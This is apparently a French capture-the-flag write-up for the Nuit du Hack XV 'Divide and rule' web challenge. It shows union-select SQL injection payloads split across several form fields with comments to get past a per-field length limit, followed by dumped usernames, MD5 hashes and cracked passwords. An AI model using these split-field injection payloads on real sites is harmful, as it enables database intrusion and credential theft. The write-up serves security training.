Nuit du Hack XV Qualifications - Divide and rule - (WEB 120)

Description

Check the new ruler site.

Points

120

Category

Web

Url

http://divideandrule.quals.nuitduhack.com/

Le site permet de faire une recherche parmi les utilisateurs existants. On cherche donc une sqli dans l'un des champs.
On trouve assez facilement la payload suivant qui fonctionne :
alt
Après quelques recherches on se rend compte qu'il est impossible de passer plus de 15 caractères par champs. Le nom du chall "Divide" nous éclaire également.
On cherche alors à diviser l'injection dans chaque champs.

firstname=Justin&lastname='union select/*&position=*/1,2,3,4,5,/*&country=*/6/*&gender=*/from users-- -

Les commentaires nous permettent de supprimer les variables et de faire une injection longue.
Pour gagner du temps on devine les champs login et password.
firstname=Justin&lastname='union select/*&position=*/1,2,3,4,5,/*&country=*/login/*&gender=*/from users-- -

firstname=Justin&lastname='union select/*&position=*/1,2,3,4,5,/*&country=*/password/*&gender=*/from users-- -

On récupère les utilisateurs / password suivant (hash md5) :

ruleradmin 04fc95a5debc7474a84fad9c50a1035d smart1985 
patrick db6eab0550da4b056d1a33ba2e8ced66 #1badgurl
raoul 7ac89e3c1f1a71ee19374d7e8912714b #1badboy

alt
FLAG : The_More_You_Split_The_More_You_Rule